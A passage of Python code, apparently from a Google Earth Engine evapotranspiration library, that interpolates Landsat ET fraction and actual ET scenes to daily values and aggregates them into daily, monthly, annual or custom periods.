                    .merge(ee.ImageCollection(next_qm_mask))\
                    .sort('system:time_start', False)\
                    .mosaic()
            else:
                # Build separate collections for before and after the target date
                prev_qm_coll = source_coll\
                    .filterDate(utc0_date.advance(-interp_days, 'day'), utc0_date)\
                    .merge(ee.ImageCollection(prev_qm_mask))
                next_qm_coll = source_coll\
                    .filterDate(utc0_date, utc0_date.advance(interp_days + 1, 'day'))\
                    .merge(ee.ImageCollection(next_qm_mask))
                # Flatten the previous/next collections to single images
                # The closest image in time should be on "top"
                # CGM - Is the previous collection already sorted?
                # prev_qm_img = prev_qm_coll.mosaic()
                prev_qm_img = prev_qm_coll.sort('system:time_start', True)\
                    .mosaic()
                next_qm_img = next_qm_coll.sort('system:time_start', False)\
                    .mosaic()
            # DEADBEEF - It might be easier to interpolate all bands instead of
            # separating the value and time bands
            # prev_value_img = ee.Image(prev_qm_img).double()
            # next_value_img = ee.Image(next_qm_img).double()
            # Interpolate all bands except the "time" band
            prev_bands = prev_qm_img.bandNames()\
                .filter(ee.Filter.notEquals('item', 'time'))
            next_bands = next_qm_img.bandNames()\
                .filter(ee.Filter.notEquals('item', 'time'))
            prev_value_img = ee.Image(prev_qm_img.select(prev_bands)).double()
            next_value_img = ee.Image(next_qm_img.select(next_bands)).double()
            prev_time_img = ee.Image(prev_qm_img.select('time')).double()
            next_time_img = ee.Image(next_qm_img.select('time')).double()
            # Fill masked values with values from the opposite image
            # Something like this is needed to ensure there are always two
            # values to interpolate between
            # For data gaps, this will cause a flat line instead of a ramp
            prev_time_mosaic = ee.Image(ee.ImageCollection.fromImages([
                next_time_img, prev_time_img]).mosaic())
            next_time_mosaic = ee.Image(ee.ImageCollection.fromImages([
                prev_time_img, next_time_img]).mosaic())
            prev_value_mosaic = ee.Image(ee.ImageCollection.fromImages([
                next_value_img, prev_value_img]).mosaic())
            next_value_mosaic = ee.Image(ee.ImageCollection.fromImages([
                prev_value_img, next_value_img]).mosaic())
            # Calculate time ratio of the current image between other cloud free images
            time_ratio_img = time_img.subtract(prev_time_mosaic)\
                .divide(next_time_mosaic.subtract(prev_time_mosaic))
            # Interpolate values to the current image time
            interp_img = next_value_mosaic.subtract(prev_value_mosaic)\
                .multiply(time_ratio_img).add(prev_value_mosaic)
            # Pass the target image back out as a new band
            target_img = image.select([0]).double()
            output_img = interp_img.addBands([target_img])\
            # TODO: Come up with a dynamic way to name the "product" bands
            # The product bands will have a "_1" appended to the name
            # i.e. "et_fraction" -> "et_fraction_1"
            if compute_product:
                output_img = output_img\
                    .addBands([interp_img.multiply(target_img)])
            return output_img.set({
                'system:index': image.get('system:index'),
                'system:time_start': image.get('system:time_start'),
                # 'system:time_start': utc0_time,
            })
        interp_coll = ee.ImageCollection(target_coll.map(_linear))
    # elif interp_method.lower() == 'nearest':
    #     interp_coll = ee.ImageCollection(target_coll.map(_nearest))
    else:
        raise ValueError('invalid interpolation method: {}'.format(interp_method))
    return interp_coll
# @deprecated
def aggregate_to_daily(image_coll, start_date=None, end_date=None,
                       agg_type='mean'):
    """Aggregate images by day without using joins

    The primary purpose of this function is to join separate Landsat images
    from the same path into a single daily image.

    Parameters
    ----------
    image_coll : ee.ImageCollection
        Input image collection.
    start_date : date, number, string, optional
        Start date.
        Needs to be an EE readable date (i.e. ISO Date string or milliseconds).
    end_date : date, number, string, optional
        Exclusive end date.
        Needs to be an EE readable date (i.e. ISO Date string or milliseconds).
    agg_type : {'mean'}, optional
        Aggregation type (the default is 'mean').
        Currently only a 'mean' aggregation type is supported.

    Returns
    -------
    ee.ImageCollection()

    Raises
    ------
    ValueError
        If `agg_type` is not a supported aggregation type.

    Notes
    -----
    This function should be used to mosaic Landsat images from same path
    but different rows.

    system:time_start of returned images will be 0 UTC (not the image time).

    """
    # Validate the aggregation type up front (only 'mean' is implemented).
    if agg_type.lower() != 'mean':
        raise ValueError('invalid aggregation type: {}'.format(agg_type))

    if start_date and end_date:
        test_coll = image_coll.filterDate(ee.Date(start_date), ee.Date(end_date))
    elif start_date:
        test_coll = image_coll.filter(ee.Filter.greaterThanOrEquals(
            'system:time_start', ee.Date(start_date).millis()))
    elif end_date:
        test_coll = image_coll.filter(ee.Filter.lessThan(
            'system:time_start', ee.Date(end_date).millis()))
    else:
        test_coll = image_coll

    # Build a sorted list of the unique "dates" in the image_coll
    date_list = ee.List(test_coll.aggregate_array('system:time_start'))\
        .map(lambda time: ee.Date(ee.Number(time)).format('yyyy-MM-dd'))\
        .distinct().sort()

    def aggregate_func(date_str):
        # Average all images acquired on this (0 UTC) date into one image.
        # This helper was referenced but missing (NameError at runtime);
        # rebuilt here to match the documented contract above.
        agg_start_date = ee.Date(ee.String(date_str))
        agg_coll = image_coll.filterDate(
            agg_start_date, agg_start_date.advance(1, 'day'))
        # agg_type was validated above; 'mean' is the only supported option.
        agg_img = agg_coll.mean()
        return agg_img.set({
            'system:index': agg_start_date.format('yyyyMMdd'),
            # 0 UTC of the aggregation date, not the original image time.
            'system:time_start': agg_start_date.millis(),
            'date': agg_start_date.format('yyyy-MM-dd'),
        })

    return ee.ImageCollection(date_list.map(aggregate_func))
def from_scene_et_fraction(scene_coll, start_date, end_date, variables,
                           interp_args, model_args, t_interval='custom',
                           use_joins=False,
                           ):
    """Interpolate from a precomputed collection of Landsat ET fraction scenes

    Parameters
    ----------
    scene_coll : ee.ImageCollection
        Non-daily 'et_fraction' images that will be interpolated.
    start_date : str
        ISO format start date.
    end_date : str
        ISO format end date (exclusive, passed directly to .filterDate()).
    variables : list
        List of variables that will be returned in the Image Collection.
    interp_args : dict
        Parameters from the INTERPOLATE section of the INI file.
        # TODO: Look into a better format for showing the options
        interp_method : {'linear}, optional
            Interpolation method.  The default is 'linear'.
        interp_days : int, str, optional
            Number of extra days before the start date and after the end date
            to include in the interpolation calculation. The default is 32.
    model_args : dict
        Parameters from the MODEL section of the INI file.  The reference
        source and parameters will need to be set here if computing
        reference ET or actual ET.
    t_interval : {'daily', 'monthly', 'annual', 'custom'}, optional
        Time interval over which to interpolate and aggregate values
        The default is 'custom' which means the aggregation time period
        will be controlled by the start and end date parameters.
    use_joins : bool, optional
        If True, use joins to link the target and source collections.
        If False, the source collection will be filtered for each target image.
        This parameter is passed through to interpolate.daily().

    Returns
    -------
    ee.ImageCollection

    Raises
    ------
    ValueError

    Notes
    -----
    This function currently assumes that "mask" and "time" bands already exist
    in the scene collection.

    """
    # Get interp_method
    if 'interp_method' in interp_args.keys():
        interp_method = interp_args['interp_method']
    else:
        interp_method = 'linear'
        logging.debug('interp_method was not set, default to "linear"')

    # Get interp_days
    if 'interp_days' in interp_args.keys():
        interp_days = interp_args['interp_days']
    else:
        interp_days = 32
        logging.debug('interp_days was not set, default to 32')

    # Check that the input parameters are valid
    if t_interval.lower() not in ['daily', 'monthly', 'annual', 'custom']:
        raise ValueError('unsupported t_interval: {}'.format(t_interval))
    elif interp_method.lower() not in ['linear']:
        raise ValueError('unsupported interp_method: {}'.format(
            interp_method))

    if ((type(interp_days) is str or type(interp_days) is float) and
            utils.is_number(interp_days)):
        interp_days = int(interp_days)
    elif not type(interp_days) is int:
        raise TypeError('interp_days must be an integer')
    elif interp_days <= 0:
        raise ValueError('interp_days must be a positive integer')

    if not variables:
        raise ValueError('variables parameter must be set')

    # Adjust start/end dates based on t_interval
    # Increase the date range to fully include the time interval
    start_dt = datetime.datetime.strptime(start_date, '%Y-%m-%d')
    end_dt = datetime.datetime.strptime(end_date, '%Y-%m-%d')
    if t_interval.lower() == 'annual':
        start_dt = datetime.datetime(start_dt.year, 1, 1)
        # Covert end date to inclusive, flatten to beginning of year,
        # then add a year which will make it exclusive
        end_dt -= relativedelta(days=+1)
        end_dt = datetime.datetime(end_dt.year, 1, 1)
        end_dt += relativedelta(years=+1)
    elif t_interval.lower() == 'monthly':
        start_dt = datetime.datetime(start_dt.year, start_dt.month, 1)
        end_dt -= relativedelta(days=+1)
        end_dt = datetime.datetime(end_dt.year, end_dt.month, 1)
        end_dt += relativedelta(months=+1)
    start_date = start_dt.strftime('%Y-%m-%d')
    end_date = end_dt.strftime('%Y-%m-%d')

    # The start/end date for the interpolation include more days
    # (+/- interp_days) than are included in the ETr collection
    interp_start_dt = start_dt - datetime.timedelta(days=interp_days)
    interp_end_dt = end_dt + datetime.timedelta(days=interp_days)
    interp_start_date = interp_start_dt.date().isoformat()
    interp_end_date = interp_end_dt.date().isoformat()

    # Get reference ET source
    if 'et_reference_source' in model_args.keys():
        et_reference_source = model_args['et_reference_source']
    else:
        raise ValueError('et_reference_source was not set')

    # Get reference ET band name
    if 'et_reference_band' in model_args.keys():
        et_reference_band = model_args['et_reference_band']
    else:
        raise ValueError('et_reference_band was not set')

    # Get reference ET factor
    if 'et_reference_factor' in model_args.keys():
        et_reference_factor = model_args['et_reference_factor']
    else:
        et_reference_factor = 1.0
        logging.debug('et_reference_factor was not set, default to 1.0')
        # raise ValueError('et_reference_factor was not set')

    # CGM - Resampling is not working correctly so commenting out for now
    # # Get reference ET resample
    # if 'et_reference_resample' in model_args.keys():
    #     et_reference_resample = model_args['et_reference_resample']
    # else:
    #     et_reference_resample = 'nearest'
    #     logging.debug(
    #         'et_reference_resample was not set, default to nearest')
    #     # raise ValueError('et_reference_resample was not set')

    if type(et_reference_source) is str:
        # Assume a string source is an single image collection ID
        #   not an list of collection IDs or ee.ImageCollection
        daily_et_ref_coll = ee.ImageCollection(et_reference_source) \
            .filterDate(start_date, end_date) \
            .select([et_reference_band], ['et_reference'])
    # elif isinstance(et_reference_source, computedobject.ComputedObject):
    #     # Interpret computed objects as image collections
    #     daily_et_reference_coll = et_reference_source \
    #         .filterDate(self.start_date, self.end_date) \
    #         .select([et_reference_band])
    else:
        raise ValueError('unsupported et_reference_source: {}'.format(
            et_reference_source))

    # Scale reference ET images (if necessary)
    # CGM - Resampling is not working correctly so not including for now
    if (et_reference_factor and et_reference_factor != 1):
        def et_reference_adjust(input_img):
            """Apply the reference ET scale factor to a daily image"""
            return input_img.multiply(et_reference_factor) \
                .copyProperties(input_img) \
                .set({'system:time_start': input_img.get('system:time_start')})
        daily_et_ref_coll = daily_et_ref_coll.map(et_reference_adjust)

    # Initialize variable list to only variables that can be interpolated
    interp_vars = ['et_fraction', 'ndvi']
    interp_vars = list(set(interp_vars) & set(variables))

    # To return ET, the ETf must be interpolated
    if 'et' in variables and 'et_fraction' not in interp_vars:
        interp_vars.append('et_fraction')

    # With the current interpolate.daily() function,
    #   something has to be interpolated in order to return et_reference
    if 'et_reference' in variables and 'et_fraction' not in interp_vars:
        interp_vars.append('et_fraction')

    # The time band is always needed for interpolation
    interp_vars.append('time')

    # TODO: Look into implementing et_fraction clamping here
    #   (similar to et_actual below)

    # Filter scene collection to the interpolation range
    # This probably isn't needed since scene_coll was built to this range
    scene_coll = scene_coll.filterDate(interp_start_date, interp_end_date)

    # For count, compute the composite/mosaic image for the mask band only
    if 'count' in variables:
        aggregate_coll = aggregate_to_daily(
            image_coll=scene_coll.select(['mask']),
            start_date=start_date, end_date=end_date)
        # The following is needed because the aggregate collection can be
        #   empty if there are no scenes in the target date range but there
        #   are scenes in the interpolation date range.
        # Without this the count image will not be built but the other
        #   bands will be which causes a non-homogeneous image collection.
        aggregate_coll = aggregate_coll.merge(
            ee.Image.constant(0).rename(['mask'])
                .set({'system:time_start': ee.Date(start_date).millis()}))

    # Interpolate to a daily time step
    daily_coll = daily(
        target_coll=daily_et_ref_coll,
        source_coll=scene_coll.select(interp_vars),
        interp_method=interp_method, interp_days=interp_days,
        use_joins=use_joins,
        compute_product=False,
    )

    # The interpolate.daily() function can/will return the product of
    # the source and target image named as "{source_band}_1".
    # The problem with this approach is that is will drop any other bands
    # that are being interpolated (such as the ndvi).
    # daily_coll = daily_coll.select(['et_fraction_1'], ['et'])

    # Compute ET from ETf and ETr (if necessary)
    # This isn't needed if compute_product=True in daily() and band is renamed
    # The check for et_fraction is needed since it is back computed from ET and ETr
    # if 'et' in variables or 'et_fraction' in variables:
    def compute_et(img):
        """This function assumes ETr and ETf are present"""
        et_img = img.select(['et_fraction']) \
            .multiply(img.select(['et_reference']))
        return img.addBands(et_img.double().rename('et'))

    daily_coll = daily_coll.map(compute_et)

    def aggregate_image(agg_start_date, agg_end_date, date_format):
        """Aggregate the daily images within the target date range

        Parameters
        ----------
        agg_start_date: ee.Date, str
            Start date (inclusive).
        agg_end_date : ee.Date, str
            End date (exclusive).
        date_format : str
            Date format for system:index (uses EE JODA format).

        Returns
        -------
        ee.Image

        Notes
        -----
        Since this function takes multiple inputs it is being called
        for each time interval by separate mappable functions

        """
        if 'et' in variables or 'et_fraction' in variables:
            et_img = daily_coll.filterDate(agg_start_date, agg_end_date) \
                .select(['et']).sum()
        if 'et_reference' in variables or 'et_fraction' in variables:
            # et_reference_img = daily_coll \
            et_reference_img = daily_et_ref_coll \
                .filterDate(agg_start_date, agg_end_date) \
                .select(['et_reference']).sum()

        image_list = []
        if 'et' in variables:
            image_list.append(et_img.float())
        if 'et_reference' in variables:
            image_list.append(et_reference_img.float())
        if 'et_fraction' in variables:
            # Compute average et fraction over the aggregation period
            image_list.append(
                et_img.divide(et_reference_img).rename(
                    ['et_fraction']).float())
        if 'ndvi' in variables:
            # Compute average ndvi over the aggregation period
            ndvi_img = daily_coll \
                .filterDate(agg_start_date, agg_end_date) \
                .mean().select(['ndvi']).float()
            image_list.append(ndvi_img)
        if 'count' in variables:
            count_img = aggregate_coll \
                .filterDate(agg_start_date, agg_end_date) \
                .select(['mask']).sum().rename('count').uint8()
            image_list.append(count_img)

        return ee.Image(image_list) \
            .set({
                'system:index': ee.Date(agg_start_date).format(date_format),
                'system:time_start': ee.Date(agg_start_date).millis()})
        #     .set(interp_properties) \

    # Combine input, interpolated, and derived values
    if t_interval.lower() == 'daily':
        def agg_daily(daily_img):
            # Map aggregate_image over each daily image's 0 UTC time_start
            agg_start_date = ee.Date(daily_img.get('system:time_start'))
            return aggregate_image(
                agg_start_date=agg_start_date,
                agg_end_date=ee.Date(agg_start_date).advance(1, 'day'),
                date_format='YYYYMMdd')
        return ee.ImageCollection(daily_coll.map(agg_daily))
    elif t_interval.lower() == 'monthly':
        def month_gen(iter_start_dt, iter_end_dt):
            """Yield ISO date strings for the first day of each month"""
            iter_dt = iter_start_dt
            while iter_dt < iter_end_dt:
                yield iter_dt.strftime('%Y-%m-%d')
                iter_dt += relativedelta(months=+1)
        month_list = ee.List(list(month_gen(start_dt, end_dt)))

        def agg_monthly(agg_start_date):
            return aggregate_image(
                agg_start_date=agg_start_date,
                agg_end_date=ee.Date(agg_start_date).advance(1, 'month'),
                date_format='YYYYMM')
        return ee.ImageCollection(month_list.map(agg_monthly))
    elif t_interval.lower() == 'annual':
        def year_gen(iter_start_dt, iter_end_dt):
            """Yield ISO date strings for the first day of each year"""
            iter_dt = iter_start_dt
            while iter_dt < iter_end_dt:
                yield iter_dt.strftime('%Y-%m-%d')
                iter_dt += relativedelta(years=+1)
        year_list = ee.List(list(year_gen(start_dt, end_dt)))

        def agg_annual(agg_start_date):
            return aggregate_image(
                agg_start_date=agg_start_date,
                agg_end_date=ee.Date(agg_start_date).advance(1, 'year'),
                date_format='YYYY')
        return ee.ImageCollection(year_list.map(agg_annual))
    elif t_interval.lower() == 'custom':
        # Returning an ImageCollection to be consistent
        return ee.ImageCollection(aggregate_image(
            agg_start_date=start_date, agg_end_date=end_date,
            date_format='YYYYMMdd'))
def from_scene_et_actual(scene_coll, start_date, end_date, variables,
                         interp_args, model_args, t_interval='custom',
                         use_joins=False,
                         ):
    """Interpolate from a precomputed collection of Landsat actual ET scenes

    Parameters
    ----------
    scene_coll : ee.ImageCollection
        Non-daily 'et' images that will be interpolated.
    start_date : str
        ISO format start date.
    end_date : str
        ISO format end date (exclusive, passed directly to .filterDate()).
    variables : list
        List of variables that will be returned in the Image Collection.
    interp_args : dict
        Parameters from the INTERPOLATE section of the INI file.
        # TODO: Look into a better format for showing the options
        interp_source : str
        interp_band : str
        interp_resample : {'nearest', 'nearest'}
        interp_method : {'linear}, optional
            Interpolation method.  The default is 'linear'.
        interp_days : int, str, optional
            Number of extra days before the start date and after the end date
            to include in the interpolation calculation. The default is 32.
        et_fraction_min : float
        et_fraction_max : float
    model_args : dict
        Parameters from the MODEL section of the INI file.  The reference
        source and other parameters will need to be set here if computing
        reference ET or ET fraction.
    t_interval : {'daily', 'monthly', 'annual', 'custom'}, optional
        Time interval over which to interpolate and aggregate values
        The default is 'custom' which means the aggregation time period
        will be controlled by the start and end date parameters.
    use_joins : bool, optional
        If True, use joins to link the target and source collections.
        If False, the source collection will be filtered for each target image.
        This parameter is passed through to interpolate.daily().

    Returns
    -------
    ee.ImageCollection

    Raises
    ------
    ValueError

    Notes
    -----
    This function currently assumes that "mask" and "time" bands already exist
    in the scene collection.

    """
    # Get interp_method
    if 'interp_method' in interp_args.keys():
        interp_method = interp_args['interp_method']
    else:
        interp_method = 'linear'
        logging.debug('interp_method was not set, default to "linear"')

    # Get interp_days
    if 'interp_days' in interp_args.keys():
        interp_days = interp_args['interp_days']
    else:
        interp_days = 32
        logging.debug('interp_days was not set, default to 32')

    # Check that the input parameters are valid
    if t_interval.lower() not in ['daily', 'monthly', 'annual', 'custom']:
        raise ValueError('unsupported t_interval: {}'.format(t_interval))
    elif interp_method.lower() not in ['linear']:
        raise ValueError('unsupported interp_method: {}'.format(
            interp_method))

    if ((type(interp_days) is str or type(interp_days) is float) and
            utils.is_number(interp_days)):
        interp_days = int(interp_days)
    elif not type(interp_days) is int:
        raise TypeError('interp_days must be an integer')
    elif interp_days <= 0:
        raise ValueError('interp_days must be a positive integer')

    if not variables:
        raise ValueError('variables parameter must be set')

    # Adjust start/end dates based on t_interval
    # Increase the date range to fully include the time interval
    start_dt = datetime.datetime.strptime(start_date, '%Y-%m-%d')
    end_dt = datetime.datetime.strptime(end_date, '%Y-%m-%d')
    if t_interval.lower() == 'annual':
        start_dt = datetime.datetime(start_dt.year, 1, 1)
        # Covert end date to inclusive, flatten to beginning of year,
        # then add a year which will make it exclusive
        end_dt -= relativedelta(days=+1)
        end_dt = datetime.datetime(end_dt.year, 1, 1)
        end_dt += relativedelta(years=+1)
    elif t_interval.lower() == 'monthly':
        start_dt = datetime.datetime(start_dt.year, start_dt.month, 1)
        end_dt -= relativedelta(days=+1)
        end_dt = datetime.datetime(end_dt.year, end_dt.month, 1)
        end_dt += relativedelta(months=+1)
    start_date = start_dt.strftime('%Y-%m-%d')
    end_date = end_dt.strftime('%Y-%m-%d')

    # The start/end date for the interpolation include more days
    # (+/- interp_days) than are included in the ETr collection
    interp_start_dt = start_dt - datetime.timedelta(days=interp_days)
    interp_end_dt = end_dt + datetime.timedelta(days=interp_days)
    interp_start_date = interp_start_dt.date().isoformat()
    interp_end_date = interp_end_dt.date().isoformat()

    # Get reference ET collection
    if 'et_reference' in variables or 'et_fraction' in variables:
        if 'et_reference_source' not in model_args.keys():
            raise ValueError('et_reference_source was not set')
        if 'et_reference_band' not in model_args.keys():
            raise ValueError('et_reference_band was not set')

        # TODO: Check if model_args can be modified instead of making new variables
        if 'et_reference_factor' in model_args.keys():
            et_reference_factor = model_args['et_reference_factor']
        else:
            et_reference_factor = 1.0
            logging.debug('et_reference_factor was not set, default to 1.0')
            # raise ValueError('et_reference_factor was not set')

        # CGM - Resampling is not working correctly so commenting out for now
        # if 'et_reference_resample' in model_args.keys():
        #     et_reference_resample = model_args['et_reference_resample']
        # else:
        #     et_reference_resample = 'nearest'
        #     logging.debug(
        #         'et_reference_resample was not set, default to nearest')
        #     # raise ValueError('et_reference_resample was not set')

        # Assume a string source is an single image collection ID
        #   not an list of collection IDs or ee.ImageCollection
        daily_et_ref_coll_id = model_args['et_reference_source']
        daily_et_ref_coll = ee.ImageCollection(daily_et_ref_coll_id) \
            .filterDate(start_date, end_date) \
            .select([model_args['et_reference_band']], ['et_reference'])

        # Scale reference ET images (if necessary)
        # CGM - Resampling is not working correctly so not including for now
        if (et_reference_factor and et_reference_factor != 1):
            def et_reference_adjust(input_img):
                """Apply the reference ET scale factor to a daily image"""
                return input_img.multiply(et_reference_factor) \
                    .copyProperties(input_img) \
                    .set({'system:time_start':
                              input_img.get('system:time_start')})
            daily_et_ref_coll = daily_et_ref_coll.map(et_reference_adjust)

    # TODO: Add code to fall back on the model_args reference ET parameters
    #   if the interp source/band/resample parameters are not set.
    # Get the interpolation collection
    if 'interp_source' not in interp_args.keys():
        raise ValueError('interp_source was not set')
    if 'interp_band' not in interp_args.keys():
        raise ValueError('interp_band was not set')

    # CGM - Resampling is not working correctly so commenting out for now
    # if 'interp_resample' not in interp_args.keys():
    #     interp_args['interp_resample'] = 'nearest'
    #     logging.debug('interp_resample was not set, defaulting to nearest')
    #     # raise ValueError('interp_resample was not set')

    # CGM - Factor is not currently being applied so commenting out for now
    # if 'interp_factor' not in interp_args.keys():
    #     interp_args['interp_factor'] = 1.0
    #     logging.debug('interp_factor was not set, defaulting to 1.0')
    #     # raise ValueError('interp_factor was not set')

    # Target collection needs to be filtered to the same date range as the
    #   scene collection in order to normalize the scenes.
    # It will be filtered again to the start/end when it is sent into
    #   interpolate.daily()
    daily_target_coll = ee.ImageCollection(interp_args['interp_source']) \
        .filterDate(interp_start_date, interp_end_date) \
        .select([interp_args['interp_band']])

    interp_vars = ['et'] + ['mask', 'time']

    # For count, compute the composite/mosaic image for the mask band only
    if 'count' in variables:
        aggregate_coll = aggregate_to_daily(
            image_coll=scene_coll.select(['mask']),
            start_date=start_date, end_date=end_date)
        # The following is needed because the aggregate collection can be
        #   empty if there are no scenes in the target date range but there
        #   are scenes in the interpolation date range.
        # Without this the count image will not be built but the other
        #   bands will be which causes a non-homogeneous image collection.
        aggregate_coll = aggregate_coll.merge(
            ee.Image.constant(0).rename(['mask'])
                .set({'system:time_start': ee.Date(start_date).millis()}))

    def normalize_et(img):
        """Normalize the scene ET by the daily target (interp source) image

        NOTE(review): reconstructed helper - the scene time_start is flattened
        to 0 UTC to look up the matching daily target image; confirm against
        the upstream implementation.
        """
        img_date = ee.Date(img.get('system:time_start')) \
            .update(hour=0, minute=0, second=0)
        img_date = ee.Date(
            img_date.millis().divide(1000).floor().multiply(1000))
        target_img = ee.Image(
            daily_target_coll
            .filterDate(img_date, img_date.advance(1, 'day'))
            .first())

        et_norm_img = img.select(['et']).divide(target_img) \
            .rename(['et_norm'])

        # Clamp the normalized ET value (et_fraction) if requested
        if 'et_fraction_max' in interp_args.keys():
            et_norm_img = et_norm_img.min(
                float(interp_args['et_fraction_max']))
        if 'et_fraction_min' in interp_args.keys():
            et_norm_img = et_norm_img.max(
                float(interp_args['et_fraction_min']))

        return img.addBands([
            et_norm_img.double(), target_img.rename(['norm'])])

    # It might be more efficient to join the target collection to the scenes
    # The time band is always needed for interpolation
    scene_coll = scene_coll \
        .filterDate(interp_start_date, interp_end_date) \
        .select(interp_vars) \
        .map(normalize_et)

    # # Join the target (normalization) image to the scene images
    # if use_joins:
    #     prev_filter = ee.Filter.And(
    #         ee.Filter.maxDifference(
    #             difference=(interp_days + 1) * 24 * 60 * 60 * 1000,
    #             leftField='system:time_start', rightField='system:time_start'),
    #         ee.Filter.greaterThan(leftField='system:time_start',
    #                               rightField='system:time_start')
    #     )
    #     scene_coll = ee.ImageCollection(
    #         ee.Join.saveFirst(matchKey='norm_img', ordering='system:time_start',
    #                           ascending=False)
    #         .apply(primary=scene_coll, secondary=target_coll,
    #                condition=prev_filter)
    #     )

    # Interpolate to a daily time step
    daily_coll = daily(
        target_coll=daily_target_coll.filterDate(start_date, end_date),
        source_coll=scene_coll.select(['et_norm', 'time']),
        interp_method=interp_method, interp_days=interp_days,
        use_joins=use_joins,
        compute_product=True,
    )

    # The interpolate.daily() function is currently returning the product of
    # the source and target image named as "{source_band}_1".
    # This approach will not be valid if other bands are interpolated.
    daily_coll = daily_coll.select(['et_norm_1'], ['et'])

    def aggregate_image(agg_start_date, agg_end_date, date_format):
        """Aggregate the daily images within the target date range

        Parameters
        ----------
        agg_start_date: ee.Date, str
            Start date (inclusive).
        agg_end_date : ee.Date, str
            End date (exclusive).
        date_format : str
            Date format for system:index (uses EE JODA format).

        Returns
        -------
        ee.Image

        Notes
        -----
        Since this function takes multiple inputs it is being called
        for each time interval by separate mappable functions

        """
        if 'et' in variables or 'et_fraction' in variables:
            et_img = daily_coll.filterDate(agg_start_date, agg_end_date) \
                .select(['et']).sum()
        if 'et_reference' in variables or 'et_fraction' in variables:
            # Get the reference ET image from the reference ET collection,
            #   not the interpolated collection
            # et_reference_img = daily_coll.select(['et_reference']) \
            et_reference_img = daily_et_ref_coll \
                .filterDate(agg_start_date, agg_end_date) \
                .sum()

        image_list = []
        if 'et' in variables:
            image_list.append(et_img.float())
        if 'et_reference' in variables:
            image_list.append(et_reference_img.float())
        if 'et_fraction' in variables:
            # Compute average et fraction over the aggregation period
            image_list.append(
                et_img.divide(et_reference_img)
                    .rename(['et_fraction']).float())
        if 'count' in variables:
            count_img = aggregate_coll \
                .filterDate(agg_start_date, agg_end_date) \
                .select(['mask']).sum().rename('count').uint8()
            image_list.append(count_img)

        return ee.Image(image_list) \
            .set({
                'system:index': ee.Date(agg_start_date).format(date_format),
                'system:time_start': ee.Date(agg_start_date).millis()})
        #     .set(interp_properties)\

    # Combine input, interpolated, and derived values
    if t_interval.lower() == 'daily':
        def agg_daily(daily_img):
            # Map aggregate_image over each daily image's 0 UTC time_start
            agg_start_date = ee.Date(daily_img.get('system:time_start'))
            return aggregate_image(
                agg_start_date=agg_start_date,
                agg_end_date=ee.Date(agg_start_date).advance(1, 'day'),
                date_format='YYYYMMdd')
        return ee.ImageCollection(daily_coll.map(agg_daily))
    elif t_interval.lower() == 'monthly':
        def month_gen(iter_start_dt, iter_end_dt):
            """Yield ISO date strings for the first day of each month"""
            iter_dt = iter_start_dt
            while iter_dt < iter_end_dt:
                yield iter_dt.strftime('%Y-%m-%d')
                iter_dt += relativedelta(months=+1)
        month_list = ee.List(list(month_gen(start_dt, end_dt)))

        def agg_monthly(agg_start_date):
            return aggregate_image(
                agg_start_date=agg_start_date,
                agg_end_date=ee.Date(agg_start_date).advance(1, 'month'),
                date_format='YYYYMM')
        return ee.ImageCollection(month_list.map(agg_monthly))
    elif t_interval.lower() == 'annual':
        def year_gen(iter_start_dt, iter_end_dt):
            """Yield ISO date strings for the first day of each year"""
            iter_dt = iter_start_dt
            while iter_dt < iter_end_dt:
                yield iter_dt.strftime('%Y-%m-%d')
                iter_dt += relativedelta(years=+1)
        year_list = ee.List(list(year_gen(start_dt, end_dt)))

        def agg_annual(agg_start_date):
            return aggregate_image(
                agg_start_date=agg_start_date,
                agg_end_date=ee.Date(agg_start_date).advance(1, 'year'),
                date_format='YYYY')
        return ee.ImageCollection(year_list.map(agg_annual))
    elif t_interval.lower() == 'custom':
        # Returning an ImageCollection to be consistent
        return ee.ImageCollection(aggregate_image(
            agg_start_date=start_date, agg_end_date=end_date,
            date_format='YYYYMMdd'))
# @deprecated
# def aggregate_daily_with_joins(image_coll, start_date, end_date,
# agg_type='mean'):
# """Aggregate images by day (using joins)
#
# The primary purpose of this function is to join separate Landsat images
# from the same path into a single daily image.
#
# Parameters
# ----------
# image_coll : ee.ImageCollection
# Input image collection.
# start_date : date, number, string
# Start date.
# Needs to be an EE readable date (i.e. ISO Date string or milliseconds).
# end_date : date, number, string
# End date.
# Needs to be an EE readable date (i.e. ISO Date string or milliseconds).
# agg_type : {'mean'}, optional
# Aggregation type (the default is 'mean').
# Currently only a 'mean' aggregation type is supported.
#
# Returns
# -------
# ee.ImageCollection()
#
# Notes
# -----
# This function should be used to mosaic Landsat images from same path
# but different rows.
# system:time_start of returned images will be 0 UTC (not the image time).
#
# """
# # Build a collection of time "features" to join to
# # "Flatten" dates to 0 UTC time
# if start_date and end_date:
# date_list = ee.List.sequence(
# ee.Date(start_date).millis(), ee.Date(end_date).millis(),
# 24 * 3600 * 1000)
# # elif start_date:
# # end_date = ee.Date(ee.Image(image_coll.limit(
# # 1, 'system:time_start', False).first()).get('system:time_start')
# # end_date = ee.Date(end_date.format('yyyy-MM-dd')).advance(1, 'day')
# # # end_date = ee.Date.fromYMD(end_date.get('year'), end_date.get('month'),
# # # end_date.get('day')).advance(1, 'day')
# # date_list = ee.List.sequence(
# # ee.Date(start_date).millis(), end_date.millis(), 24 * 3600 * 1000)
# # elif end_date:
# # start_date = ee.Date(start_date.format('yyyy-MM-dd')).advance(1, 'day')
# # # start_date = ee.Date.fromYMD(
# # # start_date.get('year'), start_date.get('month'),
# # # start_date.get('day')).advance(1, 'day')
# # date_list = ee.List.sequence(
# # start_date.millis(), ee.Date(end_date).millis(), 24 * 3600 * 1000)
# # else:
# # start_date = ee.Date(start_date.format('yyyy-MM-dd')).advance(1, 'day')
# # end_date = ee.Date(ee.Image(image_coll.limit(
# # 1, 'system:time_start', False).first()).get('system:time_start')
# # end_date = ee.Date(end_date.format('yyyy-MM-dd')).advance(1, 'day')
# # date_list = ee.List.sequence(
# # ee.Date(start_date).millis(), ee.Date(end_date).millis(),
# # 24 * 3600 * 1000)
#
# def set_date(time):
# return ee.Feature(None, {
# 'system:index': ee.Date(time).format('yyyyMMdd'),
# 'system:time_start': ee.Number(time).int64(),
# 'date': ee.Date(time).format('yyyy-MM-dd')})
#
# # Add a date property to the image collection
# def set_image_date(img):
# return ee.Image(img.set({
# 'date': ee.Date(img.get('system:time_start')).format('yyyy-MM-dd')}))
#
# join_coll = ee.FeatureCollection(
# ee.Join.saveAll('join').apply(
# ee.FeatureCollection(date_list.map(set_date)),
# ee.ImageCollection(image_coll.map(set_image_date)),
# ee.Filter.equals(leftField='date', rightField='date')))
#
# def aggregate_func(ftr):
